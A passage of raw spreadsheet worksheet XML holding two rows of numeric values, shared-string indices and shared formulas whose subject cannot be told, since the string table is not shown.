      <c r="FD134" s="111">
        <v>6.0</v>
      </c>
      <c r="FE134" s="111">
        <v>15.0</v>
      </c>
      <c r="FF134" s="101">
        <v>2002749.0</v>
      </c>
      <c r="FG134" s="111" t="s">
        <v>2275</v>
      </c>
      <c r="FH134" s="111">
        <v>5.0</v>
      </c>
      <c r="FI134" s="111">
        <v>12.0</v>
      </c>
      <c r="FJ134" s="111" t="s">
        <v>2274</v>
      </c>
      <c r="FK134" s="111">
        <v>2002749.0</v>
      </c>
      <c r="FL134" s="111" t="str">
        <f t="shared" si="216"/>
        <v>15259, 50447, 2002749, 2044770, 2002822, 2019240</v>
      </c>
      <c r="FM134" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN134" s="111" t="s">
        <v>2274</v>
      </c>
      <c r="FO134" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP134" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ134" s="111">
        <v>0.0</v>
      </c>
      <c r="FR134" s="111">
        <v>0.0</v>
      </c>
      <c r="FS134" s="112">
        <v>69.0</v>
      </c>
      <c r="FT134" s="112">
        <v>12.0</v>
      </c>
      <c r="FU134" s="112">
        <v>15.0</v>
      </c>
      <c r="FV134" s="112">
        <v>9.0</v>
      </c>
      <c r="FW134" s="112">
        <v>6.0</v>
      </c>
      <c r="FX134" s="112">
        <v>15.0</v>
      </c>
      <c r="FY134" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ134" s="112">
        <v>0.0</v>
      </c>
      <c r="GA134" s="112">
        <v>0.0</v>
      </c>
      <c r="GB134" s="112">
        <v>0.0</v>
      </c>
      <c r="GC134" s="112">
        <v>10.0</v>
      </c>
      <c r="GD134" s="112">
        <v>12.0</v>
      </c>
      <c r="GE134" s="112">
        <v>9.0</v>
      </c>
      <c r="GF134" s="112">
        <v>3.0</v>
      </c>
      <c r="GG134" s="112">
        <v>12.0</v>
      </c>
      <c r="GH134" s="113">
        <f t="shared" si="193"/>
        <v>12</v>
      </c>
      <c r="GI134" s="113">
        <f t="shared" si="194"/>
        <v>10</v>
      </c>
      <c r="GJ134" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK134" s="113">
        <f t="shared" si="196"/>
        <v>15</v>
      </c>
      <c r="GL134" s="113">
        <f t="shared" si="197"/>
        <v>12</v>
      </c>
      <c r="GM134" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN134" s="113">
        <f t="shared" si="199"/>
        <v>15</v>
      </c>
      <c r="GO134" s="113">
        <f t="shared" si="200"/>
        <v>12</v>
      </c>
      <c r="GP134" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ134" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR134" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS134" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT134" s="94"/>
      <c r="GU134" s="116">
        <v>7515669.0</v>
      </c>
      <c r="GV134" s="116">
        <v>1.0</v>
      </c>
      <c r="GW134" s="116">
        <v>1.0</v>
      </c>
      <c r="GX134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD134" s="131">
        <v>7515669.0</v>
      </c>
      <c r="HE134" s="131">
        <v>7515669.0</v>
      </c>
      <c r="HF134" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG134" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH134" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI134" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ134" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK134" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL134" s="93">
        <v>53.0</v>
      </c>
      <c r="HM134" s="93">
        <f t="shared" si="83"/>
        <v>1</v>
      </c>
      <c r="HN134" s="93">
        <v>1.0</v>
      </c>
      <c r="HO134" s="93">
        <v>0.0</v>
      </c>
      <c r="HP134" s="93">
        <v>1.0</v>
      </c>
      <c r="HQ134" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR134" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS134" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT134" s="139" t="s">
        <v>12</v>
      </c>
      <c r="HU134" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV134" s="145" t="s">
        <v>2276</v>
      </c>
      <c r="HW134" s="119">
        <v>6.0</v>
      </c>
      <c r="HX134" s="119">
        <v>6.0</v>
      </c>
      <c r="HY134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC134" s="120" t="str">
        <f t="shared" si="226"/>
        <v>86533, 32295, 599805, 656385684, 31914, 52175</v>
      </c>
      <c r="ID134" s="120" t="s">
        <v>2276</v>
      </c>
      <c r="IE134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH134" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II134" s="99" t="s">
        <v>2277</v>
      </c>
      <c r="IJ134" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK134" s="99">
        <v>69.0</v>
      </c>
      <c r="IL134" s="99">
        <v>1.0</v>
      </c>
      <c r="IM134" s="121">
        <f t="shared" si="159"/>
        <v>1</v>
      </c>
      <c r="IN134" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO134" s="98">
        <v>1.0</v>
      </c>
      <c r="IP134" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ134" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR134" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS134" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT134" s="127"/>
      <c r="IU134" s="127"/>
      <c r="IV134" s="127"/>
      <c r="IW134" s="127"/>
      <c r="IX134" s="127"/>
      <c r="IY134" s="127"/>
      <c r="IZ134" s="127"/>
      <c r="JA134" s="127"/>
      <c r="JB134" s="127"/>
      <c r="JC134" s="127"/>
      <c r="JD134" s="127"/>
      <c r="JE134" s="127"/>
      <c r="JF134" s="127"/>
      <c r="JG134" s="127"/>
      <c r="JH134" s="127"/>
      <c r="JI134" s="127"/>
      <c r="JJ134" s="127"/>
      <c r="JK134" s="127"/>
      <c r="JL134" s="127"/>
      <c r="JM134" s="127"/>
      <c r="JN134" s="127"/>
      <c r="JO134" s="127"/>
      <c r="JP134" s="127"/>
      <c r="JQ134" s="127"/>
      <c r="JR134" s="127"/>
      <c r="JS134" s="127"/>
      <c r="JT134" s="127"/>
      <c r="JU134" s="127"/>
      <c r="JV134" s="127"/>
      <c r="JW134" s="127"/>
      <c r="JX134" s="127"/>
      <c r="JY134" s="127"/>
      <c r="JZ134" s="127"/>
      <c r="KA134" s="127"/>
      <c r="KB134" s="127"/>
      <c r="KC134" s="127"/>
      <c r="KD134" s="127"/>
      <c r="KE134" s="127"/>
      <c r="KF134" s="127"/>
      <c r="KG134" s="127"/>
      <c r="KH134" s="127"/>
      <c r="KI134" s="127"/>
      <c r="KJ134" s="127"/>
      <c r="KK134" s="127"/>
      <c r="KL134" s="127"/>
      <c r="KM134" s="127"/>
      <c r="KN134" s="127"/>
      <c r="KO134" s="127"/>
      <c r="KP134" s="127"/>
      <c r="KQ134" s="127"/>
      <c r="KR134" s="127"/>
      <c r="KS134" s="127"/>
      <c r="KT134" s="127"/>
      <c r="KU134" s="127"/>
      <c r="KV134" s="127"/>
      <c r="KW134" s="127"/>
      <c r="KX134" s="127"/>
      <c r="KY134" s="127"/>
      <c r="KZ134" s="127"/>
      <c r="LA134" s="127"/>
      <c r="LB134" s="127"/>
      <c r="LC134" s="127"/>
      <c r="LD134" s="127"/>
      <c r="LE134" s="127"/>
      <c r="LF134" s="127"/>
      <c r="LG134" s="127"/>
      <c r="LH134" s="127"/>
      <c r="LI134" s="127"/>
      <c r="LJ134" s="127"/>
      <c r="LK134" s="127"/>
      <c r="LL134" s="127"/>
      <c r="LM134" s="127"/>
      <c r="LN134" s="127"/>
      <c r="LO134" s="127"/>
      <c r="LP134" s="127"/>
      <c r="LQ134" s="127"/>
      <c r="LR134" s="127"/>
      <c r="LS134" s="127"/>
      <c r="LT134" s="127"/>
      <c r="LU134" s="127"/>
      <c r="LV134" s="127"/>
      <c r="LW134" s="127"/>
      <c r="LX134" s="127"/>
      <c r="LY134" s="127"/>
      <c r="LZ134" s="127"/>
      <c r="MA134" s="127"/>
      <c r="MB134" s="127"/>
      <c r="MC134" s="127"/>
      <c r="MD134" s="127"/>
      <c r="ME134" s="127"/>
      <c r="MF134" s="127"/>
      <c r="MG134" s="127"/>
      <c r="MH134" s="127"/>
      <c r="MI134" s="127"/>
      <c r="MJ134" s="127"/>
      <c r="MK134" s="127"/>
      <c r="ML134" s="127"/>
      <c r="MM134" s="127"/>
      <c r="MN134" s="127"/>
      <c r="MO134" s="127"/>
      <c r="MP134" s="127"/>
      <c r="MQ134" s="127"/>
      <c r="MR134" s="127"/>
      <c r="MS134" s="127"/>
      <c r="MT134" s="127"/>
      <c r="MU134" s="127"/>
      <c r="MV134" s="127"/>
      <c r="MW134" s="127"/>
      <c r="MX134" s="127"/>
      <c r="MY134" s="127"/>
      <c r="MZ134" s="127"/>
      <c r="NA134" s="127"/>
      <c r="NB134" s="127"/>
      <c r="NC134" s="127"/>
      <c r="ND134" s="127"/>
      <c r="NE134" s="127"/>
      <c r="NF134" s="127"/>
      <c r="NG134" s="127"/>
      <c r="NH134" s="127"/>
      <c r="NI134" s="127"/>
      <c r="NJ134" s="127"/>
      <c r="NK134" s="127"/>
      <c r="NL134" s="127"/>
      <c r="NM134" s="127"/>
      <c r="NN134" s="127"/>
      <c r="NO134" s="127"/>
      <c r="NP134" s="127"/>
      <c r="NQ134" s="127"/>
      <c r="NR134" s="127"/>
      <c r="NS134" s="127"/>
      <c r="NT134" s="127"/>
      <c r="NU134" s="127"/>
      <c r="NV134" s="127"/>
      <c r="NW134" s="127"/>
      <c r="NX134" s="127"/>
      <c r="NY134" s="127"/>
    </row>
    <row r="135" ht="153.75" customHeight="1">
      <c r="A135" s="173"/>
      <c r="B135" s="89" t="s">
        <v>664</v>
      </c>
      <c r="C135" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D135" s="90" t="s">
        <v>665</v>
      </c>
      <c r="E135" s="90" t="s">
        <v>2261</v>
      </c>
      <c r="F135" s="90" t="s">
        <v>2262</v>
      </c>
      <c r="G135" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H135" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I135" s="92" t="s">
        <v>2263</v>
      </c>
      <c r="J135" s="92" t="s">
        <v>2264</v>
      </c>
      <c r="K135" s="92" t="s">
        <v>2278</v>
      </c>
      <c r="L135" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M135" s="93">
        <v>119.0</v>
      </c>
      <c r="N135" s="93">
        <v>4.0</v>
      </c>
      <c r="O135" s="93">
        <v>0.0</v>
      </c>
      <c r="P135" s="93">
        <v>1.0</v>
      </c>
      <c r="Q135" s="93">
        <f t="shared" si="204"/>
        <v>1</v>
      </c>
      <c r="R135" s="93">
        <v>1.0</v>
      </c>
      <c r="S135" s="93">
        <v>0.0</v>
      </c>
      <c r="T135" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U135" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V135" s="96" t="s">
        <v>2266</v>
      </c>
      <c r="W135" s="96" t="s">
        <v>2267</v>
      </c>
      <c r="X135" s="126" t="s">
        <v>2268</v>
      </c>
      <c r="Y135" s="126" t="s">
        <v>2269</v>
      </c>
      <c r="Z135" s="132" t="s">
        <v>2270</v>
      </c>
      <c r="AA135" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB135" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC135" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD135" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE135" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF135" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG135" s="98" t="s">
        <v>306</v>
      </c>
      <c r="AH135" s="99" t="s">
        <v>2271</v>
      </c>
      <c r="AI135" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ135" s="99" t="s">
        <v>13</v>
      </c>
      <c r="AK135" s="100">
        <v>254.0</v>
      </c>
      <c r="AL135" s="100">
        <v>1.0</v>
      </c>
      <c r="AM135" s="100">
        <v>3.0</v>
      </c>
      <c r="AN135" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO135" s="100">
        <v>254.0</v>
      </c>
      <c r="AP135" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ135" s="100">
        <v>3.0</v>
      </c>
      <c r="AR135" s="100">
        <v>254.0</v>
      </c>
      <c r="AS135" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT135" s="100">
        <f t="shared" si="227"/>
        <v>254</v>
      </c>
      <c r="AU135" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV135" s="100">
        <v>254.0</v>
      </c>
      <c r="AW135" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX135" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY135" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ135" s="100">
        <v>0.0</v>
      </c>
      <c r="BA135" s="102">
        <v>119.0</v>
      </c>
      <c r="BB135" s="102">
        <v>3.0</v>
      </c>
      <c r="BC135" s="102">
        <v>3.0</v>
      </c>
      <c r="BD135" s="102">
        <v>3.0</v>
      </c>
      <c r="BE135" s="102">
        <v>0.0</v>
      </c>
      <c r="BF135" s="102">
        <v>0.0</v>
      </c>
      <c r="BG135" s="102">
        <v>0.0</v>
      </c>
      <c r="BH135" s="102">
        <v>0.0</v>
      </c>
      <c r="BI135" s="102">
        <v>3.0</v>
      </c>
      <c r="BJ135" s="102">
        <v>3.0</v>
      </c>
      <c r="BK135" s="102">
        <v>3.0</v>
      </c>
      <c r="BL135" s="103">
        <f t="shared" si="167"/>
        <v>0.75</v>
      </c>
      <c r="BM135" s="103">
        <f t="shared" si="168"/>
        <v>0.75</v>
      </c>
      <c r="BN135" s="103">
        <f t="shared" si="169"/>
        <v>0</v>
      </c>
      <c r="BO135" s="103">
        <f t="shared" si="170"/>
        <v>3</v>
      </c>
      <c r="BP135" s="103">
        <f t="shared" si="171"/>
        <v>3</v>
      </c>
      <c r="BQ135" s="103">
        <f t="shared" si="172"/>
        <v>0</v>
      </c>
      <c r="BR135" s="103">
        <f t="shared" si="173"/>
        <v>3</v>
      </c>
      <c r="BS135" s="103">
        <f t="shared" si="174"/>
        <v>3</v>
      </c>
      <c r="BT135" s="103">
        <f t="shared" si="175"/>
        <v>0</v>
      </c>
      <c r="BU135" s="103">
        <f t="shared" si="217"/>
        <v>0</v>
      </c>
      <c r="BV135" s="103">
        <f t="shared" si="218"/>
        <v>0</v>
      </c>
      <c r="BW135" s="104" t="s">
        <v>2279</v>
      </c>
      <c r="BX135" s="104">
        <v>2.0</v>
      </c>
      <c r="BY135" s="104">
        <v>160.0</v>
      </c>
      <c r="BZ135" s="101" t="s">
        <v>12</v>
      </c>
      <c r="CA135" s="104" t="s">
        <v>2279</v>
      </c>
      <c r="CB135" s="104">
        <v>2.0</v>
      </c>
      <c r="CC135" s="104">
        <v>160.0</v>
      </c>
      <c r="CD135" s="104" t="s">
        <v>2279</v>
      </c>
      <c r="CE135" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CF135" s="104" t="str">
        <f t="shared" si="215"/>
        <v>254, 2013504</v>
      </c>
      <c r="CG135" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH135" s="104" t="s">
        <v>2279</v>
      </c>
      <c r="CI135" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CJ135" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CK135" s="104">
        <v>0.0</v>
      </c>
      <c r="CL135" s="104">
        <v>0.0</v>
      </c>
      <c r="CM135" s="105">
        <v>118.0</v>
      </c>
      <c r="CN135" s="105">
        <v>13.0</v>
      </c>
      <c r="CO135" s="105">
        <v>160.0</v>
      </c>
      <c r="CP135" s="105">
        <v>3.0</v>
      </c>
      <c r="CQ135" s="105">
        <v>157.0</v>
      </c>
      <c r="CR135" s="105">
        <v>160.0</v>
      </c>
      <c r="CS135" s="105">
        <v>0.0</v>
      </c>
      <c r="CT135" s="105">
        <v>0.0</v>
      </c>
      <c r="CU135" s="105">
        <v>0.0</v>
      </c>
      <c r="CV135" s="105">
        <v>0.0</v>
      </c>
      <c r="CW135" s="105">
        <v>13.0</v>
      </c>
      <c r="CX135" s="105">
        <v>160.0</v>
      </c>
      <c r="CY135" s="105">
        <v>3.0</v>
      </c>
      <c r="CZ135" s="105">
        <v>157.0</v>
      </c>
      <c r="DA135" s="105">
        <v>160.0</v>
      </c>
      <c r="DB135" s="106">
        <f t="shared" si="176"/>
        <v>3.25</v>
      </c>
      <c r="DC135" s="106">
        <f t="shared" si="177"/>
        <v>3.25</v>
      </c>
      <c r="DD135" s="106">
        <f t="shared" si="178"/>
        <v>0</v>
      </c>
      <c r="DE135" s="106">
        <f t="shared" si="179"/>
        <v>160</v>
      </c>
      <c r="DF135" s="106">
        <f t="shared" si="180"/>
        <v>160</v>
      </c>
      <c r="DG135" s="106">
        <f t="shared" si="20"/>
        <v>0</v>
      </c>
      <c r="DH135" s="106">
        <f t="shared" si="181"/>
        <v>160</v>
      </c>
      <c r="DI135" s="106">
        <f t="shared" si="182"/>
        <v>160</v>
      </c>
      <c r="DJ135" s="106">
        <f t="shared" si="183"/>
        <v>0</v>
      </c>
      <c r="DK135" s="107">
        <f t="shared" si="219"/>
        <v>0</v>
      </c>
      <c r="DL135" s="106">
        <f t="shared" si="220"/>
        <v>0</v>
      </c>
      <c r="DM135" s="108" t="s">
        <v>2279</v>
      </c>
      <c r="DN135" s="108">
        <v>2.0</v>
      </c>
      <c r="DO135" s="108">
        <v>160.0</v>
      </c>
      <c r="DP135" s="101" t="s">
        <v>12</v>
      </c>
      <c r="DQ135" s="108" t="s">
        <v>2279</v>
      </c>
      <c r="DR135" s="108">
        <v>2.0</v>
      </c>
      <c r="DS135" s="108">
        <v>160.0</v>
      </c>
      <c r="DT135" s="108" t="s">
        <v>2279</v>
      </c>
      <c r="DU135" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DV135" s="108" t="str">
        <f t="shared" si="221"/>
        <v>254, 2013504</v>
      </c>
      <c r="DW135" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX135" s="108" t="s">
        <v>2279</v>
      </c>
      <c r="DY135" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DZ135" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA135" s="108">
        <v>0.0</v>
      </c>
      <c r="EB135" s="108">
        <v>0.0</v>
      </c>
      <c r="EC135" s="109">
        <v>119.0</v>
      </c>
      <c r="ED135" s="109">
        <v>13.0</v>
      </c>
      <c r="EE135" s="109">
        <v>160.0</v>
      </c>
      <c r="EF135" s="109">
        <v>3.0</v>
      </c>
      <c r="EG135" s="109">
        <v>157.0</v>
      </c>
      <c r="EH135" s="109">
        <v>160.0</v>
      </c>
      <c r="EI135" s="109">
        <v>0.0</v>
      </c>
      <c r="EJ135" s="109">
        <v>0.0</v>
      </c>
      <c r="EK135" s="109">
        <v>0.0</v>
      </c>
      <c r="EL135" s="109">
        <v>0.0</v>
      </c>
      <c r="EM135" s="109">
        <v>13.0</v>
      </c>
      <c r="EN135" s="109">
        <v>160.0</v>
      </c>
      <c r="EO135" s="109">
        <v>3.0</v>
      </c>
      <c r="EP135" s="109">
        <v>157.0</v>
      </c>
      <c r="EQ135" s="109">
        <v>160.0</v>
      </c>
      <c r="ER135" s="110">
        <f t="shared" si="184"/>
        <v>3.25</v>
      </c>
      <c r="ES135" s="110">
        <f t="shared" si="185"/>
        <v>3.25</v>
      </c>
      <c r="ET135" s="110">
        <f t="shared" si="186"/>
        <v>0</v>
      </c>
      <c r="EU135" s="110">
        <f t="shared" si="187"/>
        <v>160</v>
      </c>
      <c r="EV135" s="110">
        <f t="shared" si="188"/>
        <v>160</v>
      </c>
      <c r="EW135" s="110">
        <f t="shared" si="189"/>
        <v>0</v>
      </c>
      <c r="EX135" s="110">
        <f t="shared" si="190"/>
        <v>160</v>
      </c>
      <c r="EY135" s="110">
        <f t="shared" si="191"/>
        <v>160</v>
      </c>
      <c r="EZ135" s="110">
        <f t="shared" si="192"/>
        <v>0</v>
      </c>
      <c r="FA135" s="110">
        <f t="shared" si="222"/>
        <v>0</v>
      </c>
      <c r="FB135" s="110">
        <f t="shared" si="223"/>
        <v>0</v>
      </c>
      <c r="FC135" s="111" t="s">
        <v>2280</v>
      </c>
      <c r="FD135" s="111">
        <v>7.0</v>
      </c>
      <c r="FE135" s="111">
        <v>291.0</v>
      </c>
      <c r="FF135" s="101" t="s">
        <v>2281</v>
      </c>
      <c r="FG135" s="111" t="s">
        <v>2282</v>
      </c>
      <c r="FH135" s="111">
        <v>3.0</v>
      </c>
      <c r="FI135" s="111">
        <v>168.0</v>
      </c>
      <c r="FJ135" s="111" t="s">
        <v>2280</v>
      </c>
      <c r="FK135" s="111" t="s">
        <v>2283</v>
      </c>
      <c r="FL135" s="111" t="str">
        <f t="shared" si="216"/>
        <v>2001117, 2022218, 2101620, 2002749, 2002752, 2013504, 254</v>
      </c>
      <c r="FM135" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN135" s="111" t="s">
        <v>2280</v>
      </c>
      <c r="FO135" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FP135" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ135" s="111">
        <v>0.0</v>
      </c>
      <c r="FR135" s="111">
        <v>0.0</v>
      </c>
      <c r="FS135" s="112">
        <v>118.0</v>
      </c>
      <c r="FT135" s="112">
        <v>76.0</v>
      </c>
      <c r="FU135" s="112">
        <v>289.0</v>
      </c>
      <c r="FV135" s="112">
        <v>3.0</v>
      </c>
      <c r="FW135" s="112">
        <v>288.0</v>
      </c>
      <c r="FX135" s="112">
        <v>289.0</v>
      </c>
      <c r="FY135" s="112">
        <v>0.0</v>
      </c>
      <c r="FZ135" s="112">
        <v>0.0</v>
      </c>
      <c r="GA135" s="112">
        <v>0.0</v>
      </c>
      <c r="GB135" s="112">
        <v>0.0</v>
      </c>
      <c r="GC135" s="112">
        <v>17.0</v>
      </c>
      <c r="GD135" s="112">
        <v>168.0</v>
      </c>
      <c r="GE135" s="112">
        <v>3.0</v>
      </c>
      <c r="GF135" s="112">
        <v>165.0</v>
      </c>
      <c r="GG135" s="112">
        <v>168.0</v>
      </c>
      <c r="GH135" s="113">
        <f t="shared" si="193"/>
        <v>19</v>
      </c>
      <c r="GI135" s="113">
        <f t="shared" si="194"/>
        <v>4.25</v>
      </c>
      <c r="GJ135" s="113">
        <f t="shared" si="195"/>
        <v>0</v>
      </c>
      <c r="GK135" s="113">
        <f t="shared" si="196"/>
        <v>289</v>
      </c>
      <c r="GL135" s="113">
        <f t="shared" si="197"/>
        <v>168</v>
      </c>
      <c r="GM135" s="113">
        <f t="shared" si="198"/>
        <v>0</v>
      </c>
      <c r="GN135" s="113">
        <f t="shared" si="199"/>
        <v>289</v>
      </c>
      <c r="GO135" s="113">
        <f t="shared" si="200"/>
        <v>168</v>
      </c>
      <c r="GP135" s="113">
        <f t="shared" si="201"/>
        <v>0</v>
      </c>
      <c r="GQ135" s="114">
        <f t="shared" si="224"/>
        <v>0</v>
      </c>
      <c r="GR135" s="113">
        <f t="shared" si="225"/>
        <v>0</v>
      </c>
      <c r="GS135" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT135" s="94"/>
      <c r="GU135" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GV135" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GW135" s="116" t="s">
        <v>12</v>
      </c>
      <c r="GX135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HE135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HF135" s="117" t="str">
        <f t="shared" si="66"/>
        <v>-</v>
      </c>
      <c r="HG135" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH135" s="116">
        <v>46402.0</v>
      </c>
      <c r="HI135" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ135" s="93" t="s">
        <v>12</v>
      </c>
      <c r="HK135" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL135" s="93">
        <v>117.0</v>
      </c>
      <c r="HM135" s="93">
        <f t="shared" si="83"/>
        <v>4</v>
      </c>
      <c r="HN135" s="93">
        <v>0.0</v>
      </c>
      <c r="HO135" s="93">
        <v>4.0</v>
      </c>
      <c r="HP135" s="93">
        <v>4.0</v>
      </c>
      <c r="HQ135" s="118">
        <f t="shared" si="53"/>
        <v>1</v>
      </c>
      <c r="HR135" s="118">
        <f t="shared" si="54"/>
        <v>1</v>
      </c>
      <c r="HS135" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT135" s="139" t="s">
        <v>2284</v>
      </c>
      <c r="HU135" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV135" s="119" t="s">
        <v>2285</v>
      </c>
      <c r="HW135" s="119">
        <v>5.0</v>
      </c>
      <c r="HX135" s="119">
        <v>60.0</v>
      </c>
      <c r="HY135" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ135" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA135" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB135" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC135" s="120" t="s">
        <v>2286</v>
      </c>
      <c r="ID135" s="120">
        <v>9999.0</v>
      </c>
      <c r="IE135" s="120">
        <v>9999.0</v>
      </c>
      <c r="IF135" s="120" t="s">
        <v>2286</v>
      </c>
      <c r="IG135" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH135" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II135" s="99" t="s">
        <v>2287</v>
      </c>
      <c r="IJ135" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK135" s="99">
        <v>121.0</v>
      </c>
      <c r="IL135" s="99">
        <v>0.0</v>
      </c>
      <c r="IM135" s="121">
        <f t="shared" si="159"/>
        <v>4</v>
      </c>
      <c r="IN135" s="122" t="s">
        <v>2288</v>
      </c>
      <c r="IO135" s="98">
        <v>4.0</v>
      </c>
      <c r="IP135" s="123">
        <f t="shared" si="58"/>
        <v>1</v>
      </c>
      <c r="IQ135" s="118">
        <f t="shared" si="59"/>
        <v>1</v>
      </c>
      <c r="IR135" s="118">
        <f t="shared" si="60"/>
        <v>1</v>
      </c>
      <c r="IS135" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT135" s="127"/>
      <c r="IU135" s="127"/>
      <c r="IV135" s="127"/>
      <c r="IW135" s="127"/>
      <c r="IX135" s="127"/>
      <c r="IY135" s="127"/>
      <c r="IZ135" s="127"/>
      <c r="JA135" s="127"/>
      <c r="JB135" s="127"/>
      <c r="JC135" s="127"/>
      <c r="JD135" s="127"/>
      <c r="JE135" s="127"/>
      <c r="JF135" s="127"/>
      <c r="JG135" s="127"/>
      <c r="JH135" s="127"/>
      <c r="JI135" s="127"/>
      <c r="JJ135" s="127"/>
      <c r="JK135" s="127"/>
      <c r="JL135" s="127"/>
      <c r="JM135" s="127"/>
      <c r="JN135" s="127"/>
      <c r="JO135" s="127"/>
      <c r="JP135" s="127"/>
      <c r="JQ135" s="127"/>
      <c r="JR135" s="127"/>
      <c r="JS135" s="127"/>
      <c r="JT135" s="127"/>
      <c r="JU135" s="127"/>
      <c r="JV135" s="127"/>
      <c r="JW135" s="127"/>
      <c r="JX135" s="127"/>
      <c r="JY135" s="127"/>
      <c r="JZ135" s="127"/>
      <c r="KA135" s="127"/>
      <c r="KB135" s="127"/>
      <c r="KC135" s="127"/>
      <c r="KD135" s="127"/>
      <c r="KE135" s="127"/>
      <c r="KF135" s="127"/>
      <c r="KG135" s="127"/>
      <c r="KH135" s="127"/>
      <c r="KI135" s="127"/>
      <c r="KJ135" s="127"/>
      <c r="KK135" s="127"/>
      <c r="KL135" s="127"/>
      <c r="KM135" s="127"/>
      <c r="KN135" s="127"/>
      <c r="KO135" s="127"/>
      <c r="KP135" s="127"/>
      <c r="KQ135" s="127"/>
      <c r="KR135" s="127"/>
      <c r="KS135" s="127"/>
      <c r="KT135" s="127"/>
